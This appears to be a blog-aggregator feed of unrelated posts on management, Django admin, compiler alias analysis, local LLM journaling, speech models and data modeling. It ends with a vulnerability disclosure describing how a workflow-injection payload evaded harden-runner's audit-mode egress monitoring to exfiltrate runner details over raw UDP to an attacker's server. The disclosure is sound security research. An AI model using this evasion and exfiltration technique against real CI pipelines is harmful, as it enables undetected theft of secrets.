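            f"DTSTART;VALUE=DATE:{release:%Y%m%d}",
            "RRULE:FREQ=YEARLY",  # recur so every anniversary shows up
            f"SUMMARY:{title} ({y}) anniversary",
            "END:VEVENT",
        ]
    lines.append("END:VCALENDAR")
    return "\r\n".join(lines)  # iCalendar wants CRLF line endings
```

An all-day `DTSTART` plus `RRULE:FREQ=YEARLY` is what makes the event reappear in subscribers' calendars every year.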


Leading Without a Map

No one can deny that our industry is in a period of great change. This industry never stops; the rate goes up and down, but change is a constant. Like it or not, " change calls the tune we dance to ." One of the biggest reasons people resist change, even people who joined the software business to "change the world," is that they feel it threatens their self-perception and identity. In the West, our job is often the primary piece of our identity. One sees it everywhere. Your LinkedIn profile has your name first, and some sort of job title or role description second. Heck, even contestants on Jeopardy are introduced as "A marketing consultant from Eyebrow, Saskatchewan ." When completing the sentence "I am a..." most people pick their job. When change is high, that self-conception can quickly feel under threat. Even in the small it can happen. If your company decides they'd be better served writing new code in Java rather than Python or Ruby, you can expect a few "Pythonistas" or "Rubyists" to push back. In their heart of hearts they may agree with the decision on its merits, but they nevertheless feel that their very identity is under threat. This can also include their social group/community/tribe membership, something that humans are genetically programmed to value and protect. So it's no doubt understandable that change can bring out strange and unpredictable behaviour in people when they feel like there's risk to their identity, self-concept, or tribal membership. Well, first of all, we can acknowledge to ourselves that we are not immune to these phenomena either. Presumably most of us started out as software developers ourselves, and when we started managing the people who did the job, it was the job we used to do, so we got it. Over time, that's drifted. New frameworks and paradigms have emerged, new 'best' practices replaced the old 'best' practices, and we became less intimately familiar with the day-to-day things our people were doing.
This is uncomfortable at times, but we adapt. We learn what we can to stay involved at the right level and to coach and guide the people we're responsible for. Now, the game is changing in a much more fundamental and profound way. And it's happening fast. I don't know what the job of software developer is going to look like in a year from now (or even 6 months for that matter) and, frankly, neither does anyone else. This makes the job of manager much, much harder. Your people are used to you having at least some concept of a map and sharing it with them, and you don't have one. Everyone's figuring it out together. A good friend and former colleague once described an aspect of leadership as "smiling while the sky is falling." I'm not sure if he came up with it or if I should attribute it to someone else, but I heard it from him first. My point here isn't that the sky is falling but rather, when your people are worried, you need to appear steadfast or you make the problem worse. You don't owe them certainty , because that would be dishonest and they'll clock your dishonesty whether they admit it or not. But just like in incident response, panic serves no one . You owe them calm reassurance that you're going to navigate this new world together and that you've got their best interests at heart. You do this even though you might be feeling the same threat to your identity. You manage engineers, but they're becoming some kind of new thing: bot-wranglers. Some of your other responsibilities are being offloaded to LLMs, and everyone's role is going to keep changing until things inevitably settle down again (relatively speaking). With no playbook, we need some kind of framework for decision making. This is where we can fall back to 'first principles'. For me these are the things I hold important. Really, the basics: It sounds simple, and really, it is. Taking care of the people right now means recognizing that they're feeling that identity risk.
The worst thing you can do is try to talk them out of it or convince them they're not feeling what they're feeling. Acknowledge that things are changing. Maintain ' esprit de corps ' as best you can. Draw on your experience navigating big changes before. If you've been around this industry for any amount of time, you've been through some big paradigm shifts and come out the other side. Tell some stories, but don't make it all about you. The business and customer angles come down to maintaining consistent principles around what software gets shipped to customers. I personally have the pleasing-to-nobody opinion that LLM coding tools are useful but not risk-free. Surely you have some skeptics in your midst who feel the same. Don't dismiss them either. Security, quality, maintainability, incident response, and the work-life balance of your people are still the responsibility of the humans running the company. That's the job right now, however the machinery of it changes. Keep taking care of your people and customers, like you always have. You already know how. " Statue of Captain George Vancouver, anchors and the Custom House, King's Lynn " by ell brown is licensed under CC BY 2.0 . Like this? Please feel free to share it on your favourite social media or link site! Share it with friends! Hit subscribe to get new posts delivered to your inbox automatically. Feedback? Get in touch !

- Doing my best to take care of the people.
- Doing what the business needs most at the given moment.
- Providing value to customers.

Justin Duke 1 weeks ago

Outgrowing Django admin

For a bit of dessert work this week, I'm working on a full-fledged attempt at replacing the majority of our stock Django admin usage with something purposeful. I say majority and not totality because even though I am an unreasonable person, I am not that unreasonable. We have over a hundred Django models, and the idea of trying to rip and replace each and every one of them — or worse yet, to design some sort of DSL by which we do that — is too quixotic even for me. The vast majority of our admin usage coalesces around three main models, and they're the ones you might guess: the user/newsletter model, the email model, and the subscriber model. My hope is that building out a markedly superior interface for interacting with these three things and sacrificing the long tail still nets out for a much happier time for myself and the support staff. Django admin is a source of as much convenience as frustration: the abstractions make it powerful and cheap when you're first scaling, but the bill for those abstractions comes due in difficult and intractable ways. When I talk with other Django developers, they divide cleanly into one of two camps: either "what are you talking about, Django admin is perfect as-is" or "oh my God, I can't believe we didn't migrate off of it sooner." Ever the annoying centrist, I find myself agreeing with both camps: Let's set aside the visual design of the admin for a second, because arguing about visual design is not compelling prose. To me, the core issue with Django's admin interface, once you get more mature, is the fact that it's a very simple request-response lifecycle. Django pulls all the data, state, and information you might need and throws it up to a massive behemoth view for you to digest and interact with. It is by definition atomic: you are looking at a specific model, and the only way to bring in other models to the detail view is by futzing around with inlines and formsets.
The classic thing that almost any Django developer at scale has run into is the N+1 problem — but not even necessarily the one you're thinking about. Take a fairly standard admin class: If you've got an email admin object and one of the fields on the is a — because you want to be able to change and see which user wrote a given email — Django by default will serialize every single possible user into a nice tag for you. Even if this doesn't incur a literal N+1, you're asking the backend to generate a select with thousands (or more) options; the serialization overhead alone will timeout your request. And so the answer is, nowadays, to use or , which pulls in a jQuery 1.9 package 1 Yes, in 2026. No, I don't want to talk about it. to call an Ajax endpoint instead: This is the kind of patch that feels like a microcosm of the whole problem: technically correct, ergonomically awkward, and aesthetically offensive. But the deeper issue is composability rather than performance. A well-defined data model has relationships that spread in every direction. A subscriber has Stripe subscriptions and Stripe charges. It has foreign keys onto email events and external events. When you're debugging an issue reported by a subscriber, you want to see all of these things in one place, interleaved and sorted chronologically. Django admin's answer to this is inlines: This works — until it doesn't. You start to run into pagination issues; you can't interleave those components with one another because they're rendered as separate, agnostic blocks; you can't easily filter or search within a single inline. You could create a helper method on the subscriber class to sort all related events and present them as a single list, but you once again run into the non-trivial problem of this being part of a fixed request-response lifecycle. 
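Set the admin aside for a moment: the "interleaved and sorted chronologically" requirement is just a k-way merge of per-source event streams. A sketch with made-up events:

```python
from heapq import merge

# Hypothetical per-source streams, each already sorted by timestamp.
email_events = [(1, "email opened"), (4, "email clicked")]
stripe_charges = [(2, "charged $5")]
external_events = [(3, "webhook sync")]

# merge() lazily interleaves sorted iterables into one sorted stream.
timeline = list(merge(email_events, stripe_charges, external_events))
```

The merge itself is the easy part; the Django-admin pain is fetching each stream efficiently and rendering the combined list inside a single fixed request-response cycle.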
And that kind of serialized lookup can get really expensive: You can do more bits of cleverness — parallelizing lookups, caching aggressively, using and everywhere — but now you're fighting the framework rather than using it. The whole point of Django admin was to not build this stuff from scratch, and yet here you are, building bespoke rendering logic inside callbacks. I still love Django admin. On the next Django project I start, I will not create a bespoke thing from day one but instead rely on my trusty, outdated friend until it's no longer bearable. But what grinds my gears is the fact that, as far as I can tell, every serious Django company has this problem and has had to solve it from scratch. There's no blessed graduation path, whether in the framework itself or the broader ecosystem. I think that's one of the big drawbacks of Django relative to its peer frameworks. As strong and amazing as its community is, it's missing a part of the flywheel from more mature deployments upstreaming their findings and discoveries back into the zeitgeist. Django admin is an amazing asset; I am excited to be, if not rid of it, at least seeing much less of it in the future.

Max Bernstein 1 weeks ago

Type-based alias analysis in the Toy Optimizer

Another entry in the Toy Optimizer series . Last time, we did load-store forwarding in the context of our Toy Optimizer. We managed to cache the results of both reads from and writes to the heap—at compile-time! We were careful to mind object aliasing: we separated our heap information into alias classes based on what offset the reads/writes referenced. This way, if we didn’t know if object and aliased, we could at least know that different offsets would never alias (assuming our objects don’t overlap and memory accesses are on word-sized slots). This is a coarse-grained heuristic. Fortunately, we often have much more information available at compile-time than just the offset, so we should use it. I mentioned in a footnote that we could use type information, for example, to improve our alias analysis. We’ll add a lightweight form of type-based alias analysis (TBAA) (PDF) in this post. We return once again to Fil Pizlo land, specifically How I implement SSA form . We’re going to be using the hierarchical heap effect representation from the post in our implementation, but you can use your own type representation if you have one already. This representation divides the heap into disjoint regions by type. Consider, for example, that objects and objects do not overlap. A pointer is never going to alias an pointer. They can therefore be reasoned about separately. But sometimes you don’t have perfect type information available. If you have in your language an base class of all objects, then the heap overlaps with, say, the heap. So you need some way to represent that too—just having an enum doesn’t work cleanly. Here is an example simplified type hierarchy: Where might represent different parts of the runtime’s data structures, and could be further segmented into , , etc. Fil’s idea is that we can represent each node in that hierarchy with a tuple of integers (inclusive, exclusive) that represent the pre- and post-order traversals of the tree. 
Or, if tree traversals are not engraved into your bones, they represent the range of all the nested objects within them. Then the “does this write interfere with this read” check—the aliasing check—is a range overlap query. Here’s a perhaps over-engineered Python implementation of the range and heap hierarchy based on the Ruby generator and C++ runtime code from JavaScriptCore: Where kicks off the tree-numbering scheme. Fil’s implementation also covers a bunch of abstract heaps such as SSAState and Control because his is used for code motion and whatnot. That can be added on later but we will not do so in this post. So there you have it: a type representation. Now we need to use it in our load-store forwarding. Recall that our load-store optimization pass looks like this: At its core, it iterates over the instructions, keeping a representation of the heap at compile-time. Reads get cached, writes get cached, and writes also invalidate the state of compile-time information about fields that may alias. In this case, our may alias asks only if the offsets overlap. This means that the following unit test will fail: This test is expecting the write to to still remain cached even though we wrote to the same offset in —because we have annotated as being an and as being a . If we account for type information in our alias analysis, we can get this test to pass. After doing a bunch of fussing around with the load-store forwarding (many rewrites), I eventually got it down to a very short diff: If we don’t have any type/alias information, we default to “I know nothing” ( ) for each object. Then we check range overlap. The boolean logic in looks a little weird, maybe. But we can also rewrite (via DeMorgan’s law) as: So, keeping all the cached field state about fields that are known by offset and by type not to alias. Maybe that is clearer (but not as nice a diff). Note that the type representation is not so important here! 
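To make the range trick concrete, here is a small illustrative sketch (not the post's actual implementation): each heap gets a half-open [begin, end) range from a DFS numbering, and "may alias" becomes a range-intersection test.

```python
class AbstractHeap:
    """A node in the type hierarchy; a parent's [begin, end) range
    contains the ranges of all of its descendants."""

    def __init__(self, name, children=()):
        self.name = name
        self.children = list(children)
        self.begin = self.end = None

    def number(self, counter=0):
        # Pre-order: claim the next number, then number the children;
        # end is one past the last number used in this subtree.
        self.begin = counter
        counter += 1
        for child in self.children:
            counter = child.number(counter)
        self.end = counter
        return counter

    def overlaps(self, other):
        # Two heaps may alias iff their ranges intersect.
        return self.begin < other.end and other.begin < self.end

# Example hierarchy: Top covers everything; Int and Str are disjoint leaves.
top = AbstractHeap("Top", [AbstractHeap("Int"), AbstractHeap("Str")])
top.number()
int_heap, str_heap = top.children
```

With this numbering, `top` overlaps both leaves (an unknown object may be an int or a str), while `int_heap` and `str_heap` never overlap each other, which is exactly the fact the load-store pass needs.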
You could use a bitset version of the type information if you want. The important things are that you can cheaply construct types and check overlap between them. Nice, now our test passes! We can differentiate between memory accesses on objects of different types. But what if we knew more? Sometimes we know where an object came from. For example, we may have seen it get allocated in the trace. If we saw an object’s allocation, we know that it does not alias (for example) any object that was passed in via a parameter. We can use this kind of information to our advantage. For example, in the following made up IR snippet: We know that (among other facts) doesn’t alias or because we have seen its allocation site. I saw this in the old V8 IR Hydrogen’s lightweight alias analysis 1 : There is plenty of other useful information such as: If you have other fun ones, please write in. We only handle loads and stores in our optimizer. Unfortunately, this means we may accidentally cache stale information. Consider: what happens if a function call (or any other opaque instruction) writes into an object we are tracking? The conservative approach is to invalidate all cached information on a function call. This is definitely correct, but it’s a bummer for the optimizer. Can we do anything? Well, perhaps we are calling a well-known function or a specific IR instruction. In that case, we can annotate it with effects in the same abstract heap model: if the instruction does not write, or only writes to some heaps, we can at least only partially invalidate our heap. However, if the function is unknown or otherwise opaque, we need at least more advanced alias information and perhaps even (partial) escape analysis. Consider: even if an instruction takes no operands, we have no idea what state it has access to. If it writes to any object A, we cannot safely cache information about any other object B unless we know for sure that A and B do not alias. 
And we don’t know what the instruction writes to. So we may only know we can cache information about B because it was allocated locally and has not escaped. Some runtimes such as ART pre-compute all of their alias information in a bit matrix. This makes more sense if you are using alias information in a full control-flow graph, where you might need to iterate over the graph a few times. In a trace context, you can do a lot in one single pass—no need to make a matrix. As usual, this is a toy IR and a toy optimizer, so it’s hard to say how much faster it makes its toy programs. In general, though, there is a dial for analysis and optimization that goes between precision and speed. This is a happy point on that dial, only a tiny incremental analysis cost bump above offset-only invalidation, but for higher precision. I like that tradeoff. Also, it is very useful in JIT compilers where generally the managed language is a little better-behaved than a C-like language . Somewhere in your IR there will be a lot of duplicate loads and stores from a strength reduction pass, and this can clean up the mess. Thanks for joining as I work through a small use of type-based alias analysis for myself. I hope you enjoyed. Thank you to Chris Gregory for helpful feedback. I made a fork of V8 to go spelunk around the Hydrogen IR. I reset the V8 repo to the last commit before they deleted it in favor of their new Sea of Nodes based IR called TurboFan.  ↩

- If we know at compile-time that object A has 5 at offset 0 and object B has 7 at offset 0, then A and B don’t alias (thanks, CF)
- In the RPython JIT in PyPy, this is used to determine if two user (Python) objects don’t alias because we know the contents of the user (Python) class field
- Object size (though perhaps that is a special case of the above bullet)
- Field size/type
- Deferring alias checks to run-time
- Have a branch

Rik Huijzer 2 weeks ago

Running `deezer/spleeter`

Here are up-to-date installation instructions for running Deezer's Spleeter on `Ubuntu 24.04`. Minimum requirements are around 16 GB of RAM. (During processing, it peaks at around 11 GB.) I ran this on a temporary Hetzner server because my Apple Silicon system, after lots of fiddling with versions, ran into AVX issues. Install Conda, then:

```
conda create -n spleeter_env python=3.8 -y
conda activate spleeter_env
conda install -c conda-forge ffmpeg libsndfile numpy=1.19 -y
pip install spleeter
spleeter separate -o audio_output input.mp3
```

If your a...

Ankur Sethi 2 weeks ago

I used a local LLM to analyze my journal entries

In 2025, I wrote 162 journal entries totaling 193,761 words. In December, as the year came to a close and I found myself in a reflective mood, I wondered if I could use an LLM to comb through these entries and extract useful insights. I’d had good luck extracting structured data from web pages using Claude, so I knew this was a task LLMs were good at. But there was a problem: I write about sensitive topics in my journal entries, and I don’t want to share them with the big LLM providers. Most of them have at least a thirty-day data retention policy, even if you call their models using their APIs, and that makes me uncomfortable. Worse, all of them have safety and abuse detection systems that get triggered if you talk about certain mental health issues. This can lead to account bans or human review of your conversations. I didn’t want my account to get banned, and the very idea of a stranger across the world reading my journal mortifies me. So I decided to use a local LLM running on my MacBook for this experiment. Writing the code was surprisingly easy. It took me a few evenings of work—and a lot of yelling at Claude Code—to build a pipeline of Python scripts that would extract structured JSON from my journal entries. I then turned that data into boring-but-serviceable visualizations. This was a fun side-project, but the data I extracted didn’t quite lead me to any new insights. That’s why I consider this a failed experiment. The output of my pipeline only confirmed what I already knew about my year. Besides, I didn’t have the hardware to run the larger models, so some of the more interesting analyses I wanted to run were plagued with hallucinations. Despite how it turned out, I’m writing about this experiment because I want to try it again in December 2026. I’m hoping I won’t repeat my mistakes again. Selfishly, I’m also hoping that somebody who knows how to use LLMs for data extraction tasks will find this article and suggest improvements to my workflow. 
I’ve pushed my data extraction and visualization scripts to GitHub. It’s mostly LLM-generated slop, but it works. The most interesting and useful parts are probably the prompts . Now let’s look at some graphs. I ran 12 different analyses on my journal, but I’m only including the output from 6 of them here. Most of the others produced nonsensical results or were difficult to visualize. For privacy, I’m not using any real names in these graphs. Here’s how I divided time between my hobbies through the year: Here are my most mentioned hobbies: This one is media I engaged with. There isn’t a lot of data for this one: How many mental health issues I complained about each day across the year: How many physical health issues I complained about each day across the year: The big events of 2025: The communities I spent most of my time with: Top mentioned people throughout the year: I ran all these analyses on my MacBook Pro with an M4 Pro and 48GB RAM. This hardware can just barely manage to run some of the more useful open-weights models, as long as I don’t run anything else. For running the models, I used Apple’s package . Picking a model took me longer than putting together the data extraction scripts. People on /r/LocalLlama had a lot of strong opinions, but there was no clear “best” model when I ran this experiment. I just had to try out a bunch of them and evaluate their outputs myself. If I had more time and faster hardware, I might have looked into building a small-scale LLM eval for this task. But for this scenario, I picked a few popular models, ran them on a subset of my journal entries, and picked one based on vibes. This project finally gave me an excuse to learn all the technical terms around LLMs. What’s quantization ? What does the number of parameters do? What does it mean when a model has , , , or in its name? What is a reasoning model ? What’s MoE ? What are active parameters? This was fun, even if my knowledge will be obsolete in six months. 
In the beginning, I ran all my scripts with Qwen 2.5 Instruct 32b at 8-bit quantization as the model. This fit in my RAM with just enough room left over for a browser, text editor, and terminal. But Qwen 2.5 didn’t produce the best output and hallucinated quite a bit, so I ran my final analyses using Llama-3.3 70B Instruct at 3bit quantization. This could just about fit in my RAM if I quit every other app and increased the amount of GPU RAM a process was allowed to use . While quickly iterating on my Python code, I used a tiny model: Qwen 3 4b Instruct quantized to 4bits. A major reason this experiment didn’t yield useful insights was that I didn’t know what questions to ask the LLM. I couldn’t do a qualitative analysis of my writing—the kind of analysis a therapist might be able to do—because I’m not a trained psychologist. Even if I could figure out the right prompts, I wouldn’t want to do this kind of work with an LLM. The potential for harm is too great, and the cost of mistakes is too high. With a few exceptions, I limited myself to extracting quantitative data only. From each journal entry, I extracted the following information: None of the models was as accurate as I had hoped at extracting this data. In many cases, I noticed hallucinations and examples from my system prompt leaking into the output, which I had to clean up afterwards. Qwen 2.5 was particularly susceptible to this. Some of the analyses (e.g. list of new people I met) produced nonsensical results, but that wasn’t really the fault of the models. They were all operating on a single journal entry at a time, so they had no sense of the larger context of my life. I couldn’t run all my journal entries through the LLM at once. I didn’t have that kind of RAM and the models didn’t have that kind of context window. I had to run the analysis one journal entry at a time. 
Even then, my computer choked on some of the larger entries, and I had to write my scripts in a way that I could run partial analyses or continue failed analyses. Trying to extract all the information listed above in one pass produced low-quality output. I had to split my analysis into multiple prompts and run them one at a time.

Surprisingly, none of the models I tried had an issue with the instruction . Even the really tiny models had no problems following the instruction. Some of them occasionally threw in a Markdown fenced code block, but it was easy enough to strip using a regex.

My prompts were divided into two parts:

The task-specific prompts included detailed instructions and examples that made the structure of the JSON output clear. Every model followed the JSON schema mentioned in the prompt, and I rarely ran into JSON parsing issues. But the one issue I never managed to fix was the examples from the prompts leaking into the extracted output. Every model insisted that I had “dinner with Sarah” several times last year, even though I don’t know anybody by that name. This name came from an example that formed part of one of my prompts. I just had to make sure the examples I used stood out—e.g., using names of people I didn’t know at all or movies I hadn’t watched—so I could filter them out using plain old Python code afterwards.

Here’s what my prompt looked like:

To this prompt, I appended task-specific prompts. Here’s the prompt for extracting health issues mentioned in an entry:

You can find all the prompts in the GitHub repository . The collected output from all the entries looked something like this:

Since my model could only look at one journal entry at a time, it would sometimes refer to the same health issue, gratitude item, location, or travel destination using different synonyms. For example, “exhaustion” and “fatigue” should refer to the same health issue, but they would appear in the output as two different issues.
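The fence-stripping cleanup described above is a one-regex job. This is my illustration of the approach, not the author's actual code, and the regex and field name are assumptions:

```python
import json
import re

# Matches an optional ```json ... ``` fence wrapped around the payload.
FENCE_RE = re.compile(r"^\s*```(?:json)?\s*(.*?)\s*```\s*$", re.DOTALL)

def parse_model_output(raw: str) -> dict:
    """Strip a Markdown code fence, if present, then parse the JSON."""
    match = FENCE_RE.match(raw)
    if match:
        raw = match.group(1)
    return json.loads(raw)

# Works whether or not the model added a fence around its JSON output.
fenced = '```json\n{"health_issues": ["fatigue"]}\n```'
print(parse_model_output(fenced))  # {'health_issues': ['fatigue']}
print(parse_model_output('{"health_issues": ["fatigue"]}'))
```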
My first attempt at de-duplicating these synonyms was to keep a running tally of unique terms discovered during each analysis and append them to the end of the prompt for each subsequent entry. Something like this:

But this quickly led to some really strange hallucinations. I still don’t understand why. This list of terms wasn’t even that long, maybe 15-20 unique terms for each analysis.

My second attempt at solving this was a separate normalization pass for each analysis. After an analysis finished running, I extracted a unique list of terms from its output file and collected them into a prompt. Then I asked the LLM to produce a mapping to de-duplicate the terms. This is what the prompt looked like:

There were better ways to do this than using an LLM. But you know what happens when all you have is a hammer? Yep, exactly. The normalization step was inefficient, but it did its job.

This was the last piece of the puzzle. With all the extraction scripts and their normalization passes working correctly, I left my MacBook running the pipeline of scripts all day. I’ve never seen an M-series MacBook get this hot. I was worried that I’d damage my hardware somehow, but it all worked out fine.

There was nothing special about the visualization step. I just decided on a list of visualizations for the data I’d extracted, then asked Claude to write some code to generate them for me. Tweak, rinse, repeat until done.

I’m underwhelmed by the results of this experiment. I didn’t quite learn anything new or interesting from the output, at least nothing I didn’t already know. This was only partly because of LLM limitations. I believe I didn’t quite know what questions to ask in the first place. What was I hoping to discover? What kinds of patterns was I looking for? What was the goal of the experiment besides producing pretty graphs?
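Once the LLM returns a synonym-to-canonical mapping, applying it is plain Python. A minimal sketch, where the mapping shape and the example terms are my assumptions based on the description above:

```python
from collections import Counter

# Hypothetical mapping as the LLM might return it: synonym -> canonical term.
normalization = {"fatigue": "exhaustion", "tiredness": "exhaustion"}

# Terms as they appeared across per-entry outputs before normalization.
raw_terms = ["exhaustion", "fatigue", "headache", "tiredness", "fatigue"]

# Map each term to its canonical form, leaving unmapped terms untouched.
canonical = [normalization.get(term, term) for term in raw_terms]
print(Counter(canonical))  # Counter({'exhaustion': 4, 'headache': 1})
```

The LLM is only needed to produce the dictionary; the mechanical rewrite and tallying afterwards need no model at all.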
I went into the project with a cool new piece of tech to try out, but skipped the important up-front human-powered thinking work required to extract good insights from data. I neglected to sit down and design a set of initial questions I wanted to answer and assumptions I wanted to test before writing the code. Just goes to show that no amount of generative AI magic will produce good results unless you can define what success looks like. Maybe this year I’ll learn more about data analysis and visualization and run this experiment again in December to see if I can go any further.

I did learn one thing from all of this: if you have access to state-of-the-art language models and know the right set of questions to ask, you can process your unstructured data to find needles in some truly massive haystacks. This allows you to analyze datasets that would take human reviewers months to comb through. A great example is how the NYT monitors hundreds of podcasts every day using LLMs. For now, I’m putting a pin in this experiment. Let’s try again in December.

- List of things I was grateful for, if any
- List of hobbies or side-projects mentioned
- List of locations mentioned
- List of media mentioned (including books, movies, games, or music)
- A boolean answer to whether it was a good or bad day for my mental health
- List of mental health issues mentioned, if any
- A boolean answer to whether it was a good or bad day for my physical health
- List of physical health issues mentioned, if any
- List of things I was proud of, if any
- List of social activities mentioned
- Travel destinations mentioned, if any
- List of friends, family members, or acquaintances mentioned
- List of new people I met that day, if any

- A “core” prompt that was common across analyses
- Task-specific prompts for each analysis

0 views
Pete Warden 2 weeks ago

Announcing Moonshine Voice

Today we’re launching Moonshine Voice , a new family of on-device speech to text models designed for live voice applications, and an open source library to run them . They support streaming , doing a lot of the compute while the user is still talking so your app can respond to user speech an order of magnitude faster than alternatives , while continuously supplying partial text updates. Our largest model has only 245 million parameters , but achieves a 6.65% word error rate on HuggingFace’s OpenASR Leaderboard compared to Whisper Large v3, which has 1.5 billion parameters and a 7.44% word error rate. We are optimized for easy integration with applications, with prebuilt packages and examples for iOS , Android , Python , MacOS , Windows , Linux , and Raspberry Pis . Everything runs on the CPU with no NPU or GPU dependencies. The code and streaming models are released under an MIT License . We’ve designed the framework to be “batteries included”, with microphone capture, voice activity detection, speaker identification (though our diarization has room for improvement), speech to text, and even intent recognition built-in, and available through a common API on all platforms. As you might be able to tell, I’m pretty excited to share this with you all! We’ve been working on this for the last 18 months, and have been dogfooding it in our own products, and I can’t wait to see what you all build with it. Please join our Discord if you have questions, and if you do find it useful, please consider giving the repository a star on GitHub; that helps us a lot.

ava's blog 2 weeks ago

focus timer

I recently felt like I couldn't trust my own judgment anymore about how much time I put into things. I could sit at my desk for 8 hours, but did I really study that much? Work that much? Volunteer that much? Blog that much? What about my breaks (chatting, videos, toilet, kitchen)? Even if I felt like I did a lot that day, I wasn't sure how much, since so much bled together.

I do not work in fixed increments (Pomodoro etc.) or set specific times when to start something. I just flow from one thing to another. I could summarize and translate a case, and then midway take a break to chat or watch a video, which then could inspire a blog post I'd write, and then I make some food, I have an idea for some pixel art and draw it, then after that I start studying, and when I need a break I continue the case again... it sounds a bit messier than it is in practice. It warps my perception though, especially because it all happens in the same location and on the same device.

So I needed a lightweight timer that would keep the time, let me label it, and then log it in a file. In the end, I could see how much I did of each thing in the file. I asked for recommendations first, then couldn't really find what I was looking for otherwise, so I settled on AI-generating a solution for me. I couldn't add learning Python onto my busy schedule and waste it on a measly timer when I should be doing other things, and I needed it right that day, so I thought that's the perfect dirty work for an LLM for once.

The timer has a 'Start' button that switches to 'Pause' once it is pressed, and 'Stop' opens a dialogue window to assign a label (= type in a word). After a label is assigned, it gets saved to a . In the CSV file, it shows date, current local time, the given label, and the timer time. The way this is read depends on your locale and how you set the separator options. For me, it is set like this: Different locale or separator detection can show the numbers in separate columns instead.
If anyone needs it, here is the AI-generated code with some manual edits by me (added symbols, adjusted how date and time is displayed in the CSV). Probably silly as hell code, but what do I know. Put it into a file called and allow it to run as executable. Reply via email Published 13 Feb, 2026

Justin Duke 2 weeks ago

One status field per model

Any sufficiently old application starts to succumb to a pernicious form of technical debt known in street parlance as shitty data modeling . Sometimes this manifests as the god object: a single model that represents the user, and the settings, and the DNS configuration, and twelve other things. Sometimes this comes in the form of a table (or multiple tables) where the initial set of data modeling concerns in the early goings of the project don't quite match the reality discovered along the way, and a series of subtle mismatches collide with each other in the same way that subtle mismatches between tectonic plates do. Data models, unlike other areas of tech debt, are correctly scary to refactor. Even in Django — an application framework with really robust, mature migration tooling — reshaping data in production is non-trivial. The weight associated with even relatively simple schema changes can be so overwhelming as to forever dissuade a would-be re-architect from making things right. Therefore, it is that much more important to spend the extra mental energy early on to make sure, whenever possible, your data model is a roughly correct one, and to course correct early when it isn't. There are many ways to do this, and the goal of describing a virtuous data model in its entirety is too large and broad a problem for this measly little essay. Instead, I want to share a heuristic that I have found particularly useful — one which is summed up, as many of my blog posts are, in the title. Every data model must have at most one status field. If you're thinking about making a change such that a model has more than one status field, you have the wrong data model. Let me illustrate via self-flagellation and talk about Buttondown's own problematic model: the object. The object has three status fields within its lush, expansive confines: This is incorrect. 
We should have created standalone models for the sending domain and hosting domain, each with a simple field of its own, and drawn foreign keys from the onto those. We did not do this, because at the time it felt like overkill. And so. You pay the price — not in any one specific bug, but in weirdness , in the difficulty of reasoning about the code. Is there a meaningful difference between an status and a of for an active newsletter, versus an status and a of ? What queries should return which combinations? The confusion compounds.

Again, I know this sounds trivial. But every good data model has syntactic sugar around the state machine, and every good state machine has a unary representation of its state. 1

1 See also: enums .

- A field (the normal one)
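A plain-Python stand-in for the refactor described above (model and field names are my invention, not Buttondown's actual schema): each domain gets its own model with exactly one status field, and the newsletter references them instead of accumulating extra status columns of its own.

```python
from dataclasses import dataclass
from enum import Enum
from typing import Optional

class DomainStatus(Enum):
    PENDING = "pending"
    VERIFIED = "verified"
    FAILED = "failed"

class NewsletterStatus(Enum):
    ACTIVE = "active"
    PAUSED = "paused"

@dataclass
class SendingDomain:
    name: str
    status: DomainStatus = DomainStatus.PENDING  # the one status field

@dataclass
class HostingDomain:
    name: str
    status: DomainStatus = DomainStatus.PENDING  # likewise, exactly one

@dataclass
class Newsletter:
    # One status field here too. Domain states live on their own models,
    # referenced rather than flattened into extra status columns.
    status: NewsletterStatus = NewsletterStatus.ACTIVE
    sending_domain: Optional[SendingDomain] = None
    hosting_domain: Optional[HostingDomain] = None

n = Newsletter(sending_domain=SendingDomain("mail.example.com"))
print(n.status.value, n.sending_domain.status.value)  # active pending
```

In Django terms these would be three models with foreign keys between them; the point is that each model's state machine keeps its unary representation.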

devansh 2 weeks ago

[CVE-2026-25598] Bypassing Outbound Connections Detection in harden-runner

GitHub Actions have become a prime vector for supply chain attacks , with attackers exploiting workflow misconfigurations to exfiltrate secrets, deploy malware, or pivot to downstream CI/CD pipelines. Notable incidents, such as the widespread compromise of tj-actions/changed-files in March 2025 (which affected over 23,000 repositories and leaked secrets via modified action versions), highlight this risk. Ephemeral runners can leak sensitive data if outbound traffic is not tightly controlled. Egress traffic —outbound connections from workflows—remains a significant blind spot, enabling data theft through techniques such as DNS tunneling, HTTP beacons, or raw socket communication. To mitigate these threats, the ecosystem has spawned specialized GitHub Actions focused on runner hardening. We will discuss one such action: Step Security's

It is a widely adopted CI/CD security agent that functions similarly to an endpoint detection and response (EDR) tool for GitHub Actions runners. It monitors network egress, enforces domain/IP allowlists, audits file integrity, and detects process anomalies in real time, including in untrusted workflows triggered by pull requests or issue comments. Tools like these often utilize eBPF hooks or iptables to enforce network policies at runtime. They aim to provide "set-it-and-forget-it" protection by detecting and preventing exfiltration attempts. These controls are particularly valuable in public repositories or environments where third-party actions and untrusted contributions introduce elevated risk.

Harden-runner monitors outbound connections through network syscalls. Most tools and commands trigger detectable patterns. But UDP, with its connectionless nature, presented an interesting attack surface: some UDP syscalls behave differently enough that they fall outside the monitoring scope. What follows are three practical techniques that exploited this gap. Note: This vulnerability only affected audit mode.
When using egress-policy: block, these connections are properly blocked. It requires the attacker to already have code execution capabilities within the GitHub Actions workflow (e.g., through workflow injection or compromised dependencies).

Affected Versions

A minimal PoC for demonstrating how to evade harden-runner, make outbound connections, and exfiltrate data:

1. Set up a GitHub repo with the following workflow:
2. Spin up a VPS and obtain a public IPv4 address.
3. Run the following Python UDP server:
4. Open an issue in the repository, and add the following comment. Note: Replace with your VPS IP address (where the UDP listener is running).
5. The runner name and OS version will be exfiltrated to your VPS's UDP listener.
6. No outbound connection to your VPS will be detected by StepSecurity.

The payload uses to output a complete, compilable C source file to , which is then compiled with and executed. The generated source code is as follows (with minor formatting for clarity):

What it does?

The payload executes a shell command that leverages to generate a complete, compilable C source file and redirect it to . This file is subsequently compiled using into an executable named , which is then run immediately. The generated source code is as follows (with minor formatting for clarity):

What it does?

The payload executes a shell command that leverages to generate a complete, compilable C source file and redirect it to . This file is subsequently compiled using into an executable named , which is then run immediately. The generated source code requires for support and is as follows (with minor formatting for clarity):

What it does?

These bypasses highlight a fundamental challenge in CI/CD security monitoring: the gap between what tools observe and what the underlying system permits. While effectively monitors common network patterns through standard syscalls like and high-level APIs, the raw socket interface—particularly UDP's connectionless syscalls—presented a harder detection problem.
